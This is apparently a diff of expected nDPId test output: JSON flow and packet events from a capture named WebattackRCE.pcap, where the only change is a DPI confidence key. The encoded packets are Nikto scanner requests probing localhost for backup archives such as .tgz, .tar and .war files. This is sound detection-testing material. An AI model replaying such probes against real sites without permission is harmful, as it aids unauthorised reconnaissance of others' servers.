(Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":182,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276955,"flow_last_seen":1576420276955,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276955,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49908,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":182,"flow_packet_id":1,"flow_last_seen":1576420276955,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276955,"pkt":"AAAAAAAAAAAAAAAACABFAADBW5ZAAEAG4J5\/AAABfwAAAcL0H5DrXWPDXa4XUYAYAED+tQAAAQEICp1m\/AOdZvwDR0VUIC8xMjcwMC50Z3ogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":182,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276955,"flow_last_seen":1576420276955,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276955,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49908,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":182,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276955,"flow_last_seen":1576420276955,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276955,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49908,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":183,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276956,"flow_last_seen":1576420276956,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276956,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49910,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":1,"flow_last_seen":1576420276956,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276956,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/O0xAAEAGAOt\/AAABfwAAAcL2H5D9kwMeqK3jJ4AYAED+swAAAQEICp1m\/ASdZvwER0VUIC8xMjcudGFyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":183,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276956,"flow_last_seen":1576420276956,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276956,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49910,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":183,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276956,"flow_last_seen":1576420276956,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276956,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49910,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":184,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276957,"flow_last_seen":1576420276957,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276957,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49912,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":184,"flow_packet_id":1,"flow_last_seen":1576420276957,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276957,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/H8ZAAEAGHHF\/AAABfwAAAcL4H5BlEieUASYiL4AYAED+swAAAQEICp1m\/AWdZvwFR0VUIC8xMjcudGFyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":184,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276957,"flow_last_seen":1576420276957,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276957,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49912,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":184,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276957,"flow_last_seen":1576420276957,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276957,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49912,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":185,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276959,"flow_last_seen":1576420276959,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276959,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49914,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":185,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":1,"flow_last_seen":1576420276959,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276959,"pkt":"AAAAAAAAAAAAAAAACABFAADIMS5AAEAGCwB\/AAABfwAAAcL6H5D33Al8T9gIjoAYAED+vAAAAQEICp1m\/AedZvwHR0VUIC8xMjdfMF8wXzEudGFyLmd6IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":185,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276959,"flow_last_seen":1576420276959,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276959,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49914,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":185,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276959,"flow_last_seen":1576420276959,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276959,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49914,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":186,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276960,"flow_last_seen":1576420276960,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276960,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49916,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":186,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":1,"flow_last_seen":1576420276960,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276960,"pkt":"AAAAAAAAAAAAAAAACABFAADI29RAAEAGYFl\/AAABfwAAAcL8H5B21OOLlrDXQ4AYAED+vAAAAQEICp1m\/AidZvwIR0VUIC8xMjdfMF8wXzEudGFyLmd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":186,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276960,"flow_last_seen":1576420276960,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276960,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49916,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":186,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276960,"flow_last_seen":1576420276960,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276960,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49916,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":187,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276961,"flow_last_seen":1576420276961,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276961,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49918,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":187,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":1,"flow_last_seen":1576420276961,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276961,"pkt":"AAAAAAAAAAAAAAAACABFAADFGIxAAEAGI6V\/AAABfwAAAcL+H5DvJyDTt9IC\/IAYAED+uQAAAQEICp1m\/AmdZvwJR0VUIC8xMjcuMC4wLjEud2FyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":187,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276961,"flow_last_seen":1576420276961,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276961,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49918,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":187,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276961,"flow_last_seen":1576420276961,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276961,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49918,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":188,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276964,"flow_last_seen":1576420276964,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276964,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49920,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":188,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":188,"flow_packet_id":1,"flow_last_seen":1576420276964,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276964,"pkt":"AAAAAAAAAAAAAAAACABFAADFxd9AAEAGdlF\/AAABfwAAAcMAH5CFNv2FdhNdEIAYAED+uQAAAQEICp1m\/AudZvwLR0VUIC8xMjcuMC4wLjEud2FyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":188,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276964,"flow_last_seen":1576420276964,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276964,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49920,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":188,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276964,"flow_last_seen":1576420276964,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276964,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49920,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":189,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276965,"flow_last_seen":1576420276965,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276965,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49922,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":189,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":189,"flow_packet_id":1,"flow_last_seen":1576420276965,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276965,"pkt":"AAAAAAAAAAAAAAAACABFAAC95pxAAEAGVZx\/AAABfwAAAcMCH5C3Cd7E92VLp4AYAED+sQAAAQEICp1m\/A2dZvwNR0VUIC8xLnRneiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":189,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276965,"flow_last_seen":1576420276965,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276965,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49922,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
